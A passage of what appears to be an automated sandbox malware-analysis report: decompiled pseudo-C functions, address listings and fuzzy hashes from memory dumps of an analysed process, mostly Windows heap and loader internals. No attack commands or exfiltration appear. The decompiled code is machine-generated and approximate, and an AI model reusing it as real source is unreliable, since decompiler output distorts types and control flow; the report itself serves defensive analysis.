                                  							goto L8;
                                  						}
                                  						_t87 = _v168;
                                  						continue;
                                  					}
                                  				}
                                  				if(_t88 != 0) {
                                  					goto L19;
                                  				}
                                  				goto L6;
                                  			}


























                                  0x03454bad
                                  0x03454bbf
                                  0x03454bc2
                                  0x03454bc6
                                  0x03454bcd
                                  0x03454bd9
                                  0x034967fe
                                  0x03496800
                                  0x03454ccc
                                  0x03454ccd
                                  0x03454cb7
                                  0x03454cc9
                                  0x03454cc9
                                  0x03454bdf
                                  0x03454be5
                                  0x00000000
                                  0x00000000
                                  0x03454beb
                                  0x03454bef
                                  0x00000000
                                  0x00000000
                                  0x03454bf5
                                  0x03454bf9
                                  0x03454c06
                                  0x03454c0b
                                  0x03454c17
                                  0x03454c1c
                                  0x03454c1f
                                  0x03454c25
                                  0x03454c33
                                  0x03454c3d
                                  0x03454c40
                                  0x03454c43
                                  0x03454c47
                                  0x03454c4d
                                  0x03454c53
                                  0x03454c54
                                  0x03454c55
                                  0x03454c56
                                  0x03454c5b
                                  0x03454c5c
                                  0x03454c63
                                  0x03454c6b
                                  0x00000000
                                  0x00000000
                                  0x03496776
                                  0x03496784
                                  0x03496784
                                  0x0349679f
                                  0x034967a7
                                  0x034967af
                                  0x034967ce
                                  0x00000000
                                  0x034967b1
                                  0x034967b7
                                  0x034967b8
                                  0x034967c1
                                  0x034967d3
                                  0x034967d9
                                  0x034967dd
                                  0x03454c94
                                  0x03454c94
                                  0x03454c98
                                  0x03454c9c
                                  0x03454ca3
                                  0x034967f4
                                  0x034967f4
                                  0x03454cb5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03454cb5
                                  0x03454c79
                                  0x03454c7e
                                  0x03454c89
                                  0x03454c8b
                                  0x03454c8f
                                  0x03454c8f
                                  0x00000000
                                  0x03454c89
                                  0x034967c3
                                  0x00000000
                                  0x034967c3
                                  0x034967af
                                  0x03454c73
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a291f8595dacdde0b6bb03b4604b20a85b6d774a39b2a60873171302a4c27935
                                  • Instruction ID: 5709fcccad75fee483668093cacc00d388e30cb5450f4d93002fbddf1b8f3289
                                  • Opcode Fuzzy Hash: a291f8595dacdde0b6bb03b4604b20a85b6d774a39b2a60873171302a4c27935
                                  • Instruction Fuzzy Hash: 43419435E002289FDF21DF65C940BAAB7B8AF45710F4600EBE908AF341D7749E85CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E03454D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				signed int _v12;
                                  				char _v176;
                                  				char _v177;
                                  				char _v184;
                                  				intOrPtr _v192;
                                  				intOrPtr _v196;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed short _t42;
                                  				char* _t44;
                                  				intOrPtr _t46;
                                  				intOrPtr _t50;
                                  				char* _t57;
                                  				intOrPtr _t59;
                                  				intOrPtr _t67;
                                  				signed int _t69;
                                  
                                  				_t64 = __edx;
                                  				_v12 =  *0x351d360 ^ _t69;
                                  				_t65 = 0xa0;
                                  				_v196 = __edx;
                                  				_v177 = 0;
                                  				_t67 = __ecx;
                                  				_v192 = __ecx;
                                  				E0346FA60( &_v176, 0, 0xa0);
                                  				_t57 =  &_v176;
                                  				_t59 = 0xa0;
                                  				if( *0x3517bc8 != 0) {
                                  					L3:
                                  					while(1) {
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t67 = _v192;
                                  						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                  						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                  						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                  						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                  						_push( &_v184);
                                  						_push(_t59);
                                  						_push(_t57);
                                  						_push(0xa0);
                                  						_push(_t57);
                                  						_push(0xf);
                                  						_t42 = E0346B0B0();
                                  						if(_t42 != 0xc0000023) {
                                  							break;
                                  						}
                                  						if(_v177 != 0) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                  						}
                                  						_v177 = 1;
                                  						_t44 = L03444620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                  						_t59 = _v184;
                                  						_t57 = _t44;
                                  						if(_t57 != 0) {
                                  							continue;
                                  						} else {
                                  							_t42 = 0xc0000017;
                                  							break;
                                  						}
                                  					}
                                  					if(_t42 != 0) {
                                  						_t65 = E0342CCC0(_t42);
                                  						if(_t65 != 0) {
                                  							L10:
                                  							if(_v177 != 0) {
                                  								if(_t57 != 0) {
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                  								}
                                  							}
                                  							_t46 = _t65;
                                  							L12:
                                  							return E0346B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                  						}
                                  						L7:
                                  						_t50 = _a4;
                                  						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                  						if(_t50 != 3) {
                                  							if(_t50 == 2) {
                                  								goto L8;
                                  							}
                                  							L9:
                                  							if(E0346F380(_t67 + 0xc, 0x3405138, 0x10) == 0) {
                                  								 *0x35160d8 = _t67;
                                  							}
                                  							goto L10;
                                  						}
                                  						L8:
                                  						_t64 = _t57 + 0x28;
                                  						E03454F49(_t67, _t57 + 0x28);
                                  						goto L9;
                                  					}
                                  					_t65 = 0;
                                  					goto L7;
                                  				}
                                  				if(E03454E70(0x35186b0, 0x3455690, 0, 0) != 0) {
                                  					_t46 = E0342CCC0(_t56);
                                  					goto L12;
                                  				} else {
                                  					_t59 = 0xa0;
                                  					goto L3;
                                  				}
                                  			}




















                                  0x03454d3b
                                  0x03454d4d
                                  0x03454d53
                                  0x03454d58
                                  0x03454d65
                                  0x03454d6c
                                  0x03454d71
                                  0x03454d77
                                  0x03454d7f
                                  0x03454d8c
                                  0x03454d8e
                                  0x03454dad
                                  0x03454db0
                                  0x03454db7
                                  0x03454db8
                                  0x03454db9
                                  0x03454dba
                                  0x03454dbb
                                  0x03454dc1
                                  0x03454dc8
                                  0x03454dcc
                                  0x03454dd5
                                  0x03454dde
                                  0x03454ddf
                                  0x03454de0
                                  0x03454de1
                                  0x03454de6
                                  0x03454de7
                                  0x03454de9
                                  0x03454df3
                                  0x00000000
                                  0x00000000
                                  0x03496c7c
                                  0x03496c8a
                                  0x03496c8a
                                  0x03496c9d
                                  0x03496ca7
                                  0x03496cac
                                  0x03496cb2
                                  0x03496cb9
                                  0x00000000
                                  0x03496cbf
                                  0x03496cbf
                                  0x00000000
                                  0x03496cbf
                                  0x03496cb9
                                  0x03454dfb
                                  0x03496ccf
                                  0x03496cd3
                                  0x03454e32
                                  0x03454e39
                                  0x03496ce0
                                  0x03496cf2
                                  0x03496cf2
                                  0x03496ce0
                                  0x03454e3f
                                  0x03454e41
                                  0x03454e51
                                  0x03454e51
                                  0x03454e03
                                  0x03454e03
                                  0x03454e09
                                  0x03454e0f
                                  0x03454e57
                                  0x00000000
                                  0x00000000
                                  0x03454e1b
                                  0x03454e30
                                  0x03454e5b
                                  0x03454e5b
                                  0x00000000
                                  0x03454e30
                                  0x03454e11
                                  0x03454e11
                                  0x03454e16
                                  0x00000000
                                  0x03454e16
                                  0x03454e01
                                  0x00000000
                                  0x03454e01
                                  0x03454da5
                                  0x03496c6b
                                  0x00000000
                                  0x03454dab
                                  0x03454dab
                                  0x00000000
                                  0x03454dab

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bee174bd3e609461a497e5486e0de3a137d4f4c4c30cf2ac5881a74a56d89ca2
                                  • Instruction ID: 7b6d4a619164db69181a5932bda82e14bfbf000d1606aa733e72312b942a877a
                                  • Opcode Fuzzy Hash: bee174bd3e609461a497e5486e0de3a137d4f4c4c30cf2ac5881a74a56d89ca2
                                  • Instruction Fuzzy Hash: 2B41A075A403189FEB21DF16CC80F6BB7A9EB45610F0500ABFD499F381D774AD848A99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E03438A0A(intOrPtr* __ecx, signed int __edx) {
                                  				signed int _v8;
                                  				char _v524;
                                  				signed int _v528;
                                  				void* _v532;
                                  				char _v536;
                                  				char _v540;
                                  				char _v544;
                                  				intOrPtr* _v548;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t44;
                                  				void* _t46;
                                  				void* _t48;
                                  				signed int _t53;
                                  				signed int _t55;
                                  				intOrPtr* _t62;
                                  				void* _t63;
                                  				unsigned int _t75;
                                  				signed int _t79;
                                  				unsigned int _t81;
                                  				unsigned int _t83;
                                  				signed int _t84;
                                  				void* _t87;
                                  
                                  				_t76 = __edx;
                                  				_v8 =  *0x351d360 ^ _t84;
                                  				_v536 = 0x200;
                                  				_t79 = 0;
                                  				_v548 = __edx;
                                  				_v544 = 0;
                                  				_t62 = __ecx;
                                  				_v540 = 0;
                                  				_v532 =  &_v524;
                                  				if(__edx == 0 || __ecx == 0) {
                                  					L6:
                                  					return E0346B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                  				} else {
                                  					_v528 = 0;
                                  					E0343E9C0(1, __ecx, 0, 0,  &_v528);
                                  					_t44 = _v528;
                                  					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                  					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                  					_t46 = 0xa;
                                  					_t87 = _t81 - _t46;
                                  					if(_t87 > 0 || _t87 == 0) {
                                  						 *_v548 = 0x3401180;
                                  						L5:
                                  						_t79 = 1;
                                  						goto L6;
                                  					} else {
                                  						_t48 = E03451DB5(_t62,  &_v532,  &_v536);
                                  						_t76 = _v528;
                                  						if(_t48 == 0) {
                                  							L9:
                                  							E03463C2A(_t81, _t76,  &_v544);
                                  							 *_v548 = _v544;
                                  							goto L5;
                                  						}
                                  						_t62 = _v532;
                                  						if(_t62 != 0) {
                                  							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                  							_t53 =  *_t62;
                                  							_v528 = _t53;
                                  							if(_t53 != 0) {
                                  								_t63 = _t62 + 4;
                                  								_t55 = _v528;
                                  								do {
                                  									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                  										if(E03438999(_t63,  &_v540) == 0) {
                                  											_t55 = _v528;
                                  										} else {
                                  											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                  											_t55 = _v528;
                                  											if(_t75 >= _t83) {
                                  												_t83 = _t75;
                                  											}
                                  										}
                                  									}
                                  									_t63 = _t63 + 0x14;
                                  									_t55 = _t55 - 1;
                                  									_v528 = _t55;
                                  								} while (_t55 != 0);
                                  								_t62 = _v532;
                                  							}
                                  							if(_t62 !=  &_v524) {
                                  								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                  							}
                                  							_t76 = _t83 & 0x0000ffff;
                                  							_t81 = _t83 >> 0x10;
                                  						}
                                  						goto L9;
                                  					}
                                  				}
                                  			}



























                                  0x03438a0a
                                  0x03438a1c
                                  0x03438a23
                                  0x03438a2e
                                  0x03438a30
                                  0x03438a36
                                  0x03438a3c
                                  0x03438a3e
                                  0x03438a4a
                                  0x03438a52
                                  0x03438a9c
                                  0x03438aae
                                  0x03438a58
                                  0x03438a5e
                                  0x03438a6a
                                  0x03438a6f
                                  0x03438a75
                                  0x03438a7d
                                  0x03438a85
                                  0x03438a86
                                  0x03438a89
                                  0x03438a93
                                  0x03438a99
                                  0x03438a9b
                                  0x00000000
                                  0x03438aaf
                                  0x03438abe
                                  0x03438ac3
                                  0x03438acb
                                  0x03438ad7
                                  0x03438ae0
                                  0x03438af1
                                  0x00000000
                                  0x03438af1
                                  0x03438acd
                                  0x03438ad5
                                  0x03438afb
                                  0x03438afd
                                  0x03438aff
                                  0x03438b07
                                  0x03438b22
                                  0x03438b24
                                  0x03438b2a
                                  0x03438b2e
                                  0x03438b3f
                                  0x03438b78
                                  0x03438b41
                                  0x03438b52
                                  0x03438b54
                                  0x03438b5c
                                  0x03438b74
                                  0x03438b74
                                  0x03438b5c
                                  0x03438b3f
                                  0x03438b5e
                                  0x03438b61
                                  0x03438b64
                                  0x03438b64
                                  0x03438b6c
                                  0x03438b6c
                                  0x03438b11
                                  0x03489cd5
                                  0x03489cd5
                                  0x03438b17
                                  0x03438b1a
                                  0x03438b1a
                                  0x00000000
                                  0x03438ad5
                                  0x03438a89

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14b61d86ae2050d3fedcdc60794c59d969cf011d412a9f5a6e04fc94265fb336
                                  • Instruction ID: 4828f9d0bc2c07eaab5c9d967d54c43ed09db2d3c8f4021df32e2e765d08bf04
                                  • Opcode Fuzzy Hash: 14b61d86ae2050d3fedcdc60794c59d969cf011d412a9f5a6e04fc94265fb336
                                  • Instruction Fuzzy Hash: CB4183B5A0032D9BDB24DF55C888AAAF3B8EB49300F1441EAF8199B351D7709E88CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034EAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				signed int _v16;
                                  				signed char _v20;
                                  				intOrPtr _v24;
                                  				char* _t37;
                                  				void* _t47;
                                  				signed char _t51;
                                  				void* _t53;
                                  				char _t55;
                                  				intOrPtr _t57;
                                  				signed char _t61;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				signed int _t81;
                                  				intOrPtr _t82;
                                  
                                  				_t53 = __ecx;
                                  				_t55 = 0;
                                  				_v20 = _v20 & 0;
                                  				_t75 = __edx;
                                  				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                  				_v24 = __edx;
                                  				_v12 = 0;
                                  				if((_t81 & 0x01000000) != 0) {
                                  					L5:
                                  					if(_a8 != 0) {
                                  						_t81 = _t81 | 0x00000008;
                                  					}
                                  					_t57 = E034EABF4(_t55 + _t75, _t81);
                                  					_v8 = _t57;
                                  					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                  						_t76 = 0;
                                  						_v16 = _v16 & 0;
                                  					} else {
                                  						_t59 = _t53;
                                  						_t76 = E034EAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                  						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                  							_t47 = E034EAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                  							_t61 = _v20;
                                  							if(_t61 != 0) {
                                  								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                  								if(E034CCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                  									L034477F0(_t53, 0, _t76);
                                  									_t76 = 0;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_t82 = _v8;
                                  					L16:
                                  					if(E03447D50() == 0) {
                                  						_t37 = 0x7ffe0380;
                                  					} else {
                                  						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  					}
                                  					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                  						E034E131B(_t53, _t76, _t82, _v16);
                                  					}
                                  					return _t76;
                                  				}
                                  				_t51 =  *(__ecx + 0x20);
                                  				_v20 = _t51;
                                  				if(_t51 == 0) {
                                  					goto L5;
                                  				}
                                  				_t81 = _t81 | 0x00000008;
                                  				if(E034CCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                  					_t55 = _v12;
                                  					goto L5;
                                  				} else {
                                  					_t82 = 0;
                                  					_t76 = 0;
                                  					_v16 = _v16 & 0;
                                  					goto L16;
                                  				}
                                  			}



















                                  0x034eaa1f
                                  0x034eaa21
                                  0x034eaa23
                                  0x034eaa2b
                                  0x034eaa30
                                  0x034eaa36
                                  0x034eaa39
                                  0x034eaa42
                                  0x034eaa75
                                  0x034eaa7a
                                  0x034eaa7c
                                  0x034eaa7c
                                  0x034eaa88
                                  0x034eaa8a
                                  0x034eaa8f
                                  0x034eab02
                                  0x034eab04
                                  0x034eaa99
                                  0x034eaaa8
                                  0x034eaaaf
                                  0x034eaab3
                                  0x034eaacc
                                  0x034eaad1
                                  0x034eaad6
                                  0x034eaae0
                                  0x034eaaf3
                                  0x034eaaf9
                                  0x034eaafe
                                  0x034eaafe
                                  0x034eaaf3
                                  0x034eaad6
                                  0x034eaab3
                                  0x034eab07
                                  0x034eab0a
                                  0x034eab11
                                  0x034eab23
                                  0x034eab13
                                  0x034eab1c
                                  0x034eab1c
                                  0x034eab2b
                                  0x034eab44
                                  0x034eab44
                                  0x034eab51
                                  0x034eab51
                                  0x034eaa44
                                  0x034eaa47
                                  0x034eaa4c
                                  0x00000000
                                  0x00000000
                                  0x034eaa5a
                                  0x034eaa64
                                  0x034eaa72
                                  0x00000000
                                  0x034eaa66
                                  0x034eaa66
                                  0x034eaa68
                                  0x034eaa6a
                                  0x00000000
                                  0x034eaa6a

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                  • Instruction ID: eb540438fe3604c0c07ad39248b66a7959c501995695b32940d4f775e5a64b1e
                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                  • Instruction Fuzzy Hash: 18311336F10244AFDB15CB6AC884BAFF7ABEF80212F09406FE914AF381DA708D01C654
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E034EFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                  				char _v8;
                                  				signed int _v12;
                                  				signed int _t29;
                                  				char* _t32;
                                  				char* _t43;
                                  				signed int _t80;
                                  				signed int* _t84;
                                  
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t56 = __edx;
                                  				_t84 = __ecx;
                                  				_t80 = E034EFD4E(__ecx, __edx);
                                  				_v12 = _t80;
                                  				if(_t80 != 0) {
                                  					_t29 =  *__ecx & _t80;
                                  					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                  					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                  						E034F0A13(__ecx, _t80, 0, _a4);
                                  						_t80 = 1;
                                  						if(E03447D50() == 0) {
                                  							_t32 = 0x7ffe0380;
                                  						} else {
                                  							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  						}
                                  						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                  							_push(3);
                                  							L21:
                                  							E034E1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                  						}
                                  						goto L22;
                                  					}
                                  					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                  						_t80 = E034F2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                  						if(_t80 != 0) {
                                  							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                  							_t77 = _v8;
                                  							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                  								E034EC8F7(_t66, _t77, 0);
                                  							}
                                  						}
                                  					} else {
                                  						_t80 = E034EDBD2(__ecx[0xb], _t74, __edx, _a4);
                                  					}
                                  					if(E03447D50() == 0) {
                                  						_t43 = 0x7ffe0380;
                                  					} else {
                                  						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  					}
                                  					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                  						goto L22;
                                  					} else {
                                  						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                  						goto L21;
                                  					}
                                  				} else {
                                  					_push(__ecx);
                                  					_push(_t80);
                                  					E034EA80D(__ecx[0xf], 9, __edx, _t80);
                                  					L22:
                                  					return _t80;
                                  				}
                                  			}










                                  0x034efde7
                                  0x034efde8
                                  0x034efdec
                                  0x034efdee
                                  0x034efdf5
                                  0x034efdf7
                                  0x034efdfc
                                  0x034efe19
                                  0x034efe22
                                  0x034efe26
                                  0x034efec6
                                  0x034efecd
                                  0x034efed5
                                  0x034efee7
                                  0x034efed7
                                  0x034efee0
                                  0x034efee0
                                  0x034efeef
                                  0x034eff00
                                  0x034eff02
                                  0x034eff07
                                  0x034eff07
                                  0x00000000
                                  0x034efeef
                                  0x034efe33
                                  0x034efe55
                                  0x034efe59
                                  0x034efe5b
                                  0x034efe5e
                                  0x034efe69
                                  0x034efe6d
                                  0x034efe6d
                                  0x034efe69
                                  0x034efe35
                                  0x034efe41
                                  0x034efe41
                                  0x034efe79
                                  0x034efe8b
                                  0x034efe7b
                                  0x034efe84
                                  0x034efe84
                                  0x034efe93
                                  0x00000000
                                  0x034efea8
                                  0x034efeba
                                  0x00000000
                                  0x034efeba
                                  0x034efdfe
                                  0x034efe01
                                  0x034efe02
                                  0x034efe08
                                  0x034eff0c
                                  0x034eff14
                                  0x034eff14

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                  • Instruction ID: 4bc6bfb530a2b2f498c516e5355afbbe2e8216a2eebc324a71407cb66715f24f
                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                  • Instruction Fuzzy Hash: 9E3114362006406FD322CB69C844F6BBBA9EFC5242F1E445BE9468F342DA74EC46C728
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E034EEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                  				signed int _v8;
                                  				char _v12;
                                  				intOrPtr _v15;
                                  				char _v16;
                                  				intOrPtr _v19;
                                  				void* _v28;
                                  				intOrPtr _v36;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed char _t26;
                                  				signed int _t27;
                                  				char* _t40;
                                  				unsigned int* _t50;
                                  				intOrPtr* _t58;
                                  				unsigned int _t59;
                                  				char _t75;
                                  				signed int _t86;
                                  				intOrPtr _t88;
                                  				intOrPtr* _t91;
                                  
                                  				_t75 = __edx;
                                  				_t91 = __ecx;
                                  				_v12 = __edx;
                                  				_t50 = __ecx + 0x30;
                                  				_t86 = _a4 & 0x00000001;
                                  				if(_t86 == 0) {
                                  					E03442280(_t26, _t50);
                                  					_t75 = _v16;
                                  				}
                                  				_t58 = _t91;
                                  				_t27 = E034EE815(_t58, _t75);
                                  				_v8 = _t27;
                                  				if(_t27 != 0) {
                                  					E0342F900(_t91 + 0x34, _t27);
                                  					if(_t86 == 0) {
                                  						E0343FFB0(_t50, _t86, _t50);
                                  					}
                                  					_push( *((intOrPtr*)(_t91 + 4)));
                                  					_push( *_t91);
                                  					_t59 =  *(_v8 + 0x10);
                                  					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                  					_push(0x8000);
                                  					_t11 = _t53 - 1; // 0x0
                                  					_t12 = _t53 - 1; // 0x0
                                  					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                  					E034EAFDE( &_v12,  &_v16);
                                  					asm("lock xadd [eax], ecx");
                                  					asm("lock xadd [eax], ecx");
                                  					E034EBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                  					_t55 = _v36;
                                  					_t88 = _v36;
                                  					if(E03447D50() == 0) {
                                  						_t40 = 0x7ffe0388;
                                  					} else {
                                  						_t55 = _v19;
                                  						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  					}
                                  					if( *_t40 != 0) {
                                  						E034DFE3F(_t55, _t91, _v15, _t55);
                                  					}
                                  				} else {
                                  					if(_t86 == 0) {
                                  						E0343FFB0(_t50, _t86, _t50);
                                  						_t75 = _v16;
                                  					}
                                  					_push(_t58);
                                  					_t88 = 0;
                                  					_push(0);
                                  					E034EA80D(_t91, 8, _t75, 0);
                                  				}
                                  				return _t88;
                                  			}






















                                  0x034eea55
                                  0x034eea66
                                  0x034eea68
                                  0x034eea6c
                                  0x034eea6f
                                  0x034eea72
                                  0x034eea75
                                  0x034eea7a
                                  0x034eea7a
                                  0x034eea7e
                                  0x034eea80
                                  0x034eea85
                                  0x034eea8b
                                  0x034eeab5
                                  0x034eeabc
                                  0x034eeabf
                                  0x034eeabf
                                  0x034eeaca
                                  0x034eeace
                                  0x034eead0
                                  0x034eeae4
                                  0x034eeaeb
                                  0x034eeaf0
                                  0x034eeaf5
                                  0x034eeb09
                                  0x034eeb0d
                                  0x034eeb1d
                                  0x034eeb2d
                                  0x034eeb38
                                  0x034eeb3d
                                  0x034eeb41
                                  0x034eeb4a
                                  0x034eeb60
                                  0x034eeb4c
                                  0x034eeb52
                                  0x034eeb59
                                  0x034eeb59
                                  0x034eeb68
                                  0x034eeb71
                                  0x034eeb71
                                  0x034eea8d
                                  0x034eea8f
                                  0x034eea92
                                  0x034eea97
                                  0x034eea97
                                  0x034eea9b
                                  0x034eea9c
                                  0x034eea9e
                                  0x034eeaa6
                                  0x034eeaa6
                                  0x034eeb7e

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction ID: 261d7fc429466a963a046d89de4f8f18c1d75c2de1d25834e5f7b28738eee57c
                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction Fuzzy Hash: 4531A1766047059FC729DF25C880A6BB7A9FFC4210F044A2EF9568F744DA30E809CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E034A69A6(signed short* __ecx, void* __eflags) {
                                  				signed int _v8;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed short _v28;
                                  				signed int _v32;
                                  				intOrPtr _v36;
                                  				signed int _v40;
                                  				char* _v44;
                                  				signed int _v48;
                                  				intOrPtr _v52;
                                  				signed int _v56;
                                  				char _v60;
                                  				signed int _v64;
                                  				char _v68;
                                  				char _v72;
                                  				signed short* _v76;
                                  				signed int _v80;
                                  				char _v84;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t68;
                                  				intOrPtr _t73;
                                  				signed short* _t74;
                                  				void* _t77;
                                  				void* _t78;
                                  				signed int _t79;
                                  				signed int _t80;
                                  
                                  				_v8 =  *0x351d360 ^ _t80;
                                  				_t75 = 0x100;
                                  				_v64 = _v64 & 0x00000000;
                                  				_v76 = __ecx;
                                  				_t79 = 0;
                                  				_t68 = 0;
                                  				_v72 = 1;
                                  				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                  				_t77 = 0;
                                  				if(L03436C59(__ecx[2], 0x100, __eflags) != 0) {
                                  					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                  					if(_t79 != 0 && E034A6BA3() != 0) {
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0x1f0003);
                                  						_push( &_v64);
                                  						if(E03469980() >= 0) {
                                  							E03442280(_t56, 0x3518778);
                                  							_t77 = 1;
                                  							_t68 = 1;
                                  							if( *0x3518774 == 0) {
                                  								asm("cdq");
                                  								 *(_t79 + 0xf70) = _v64;
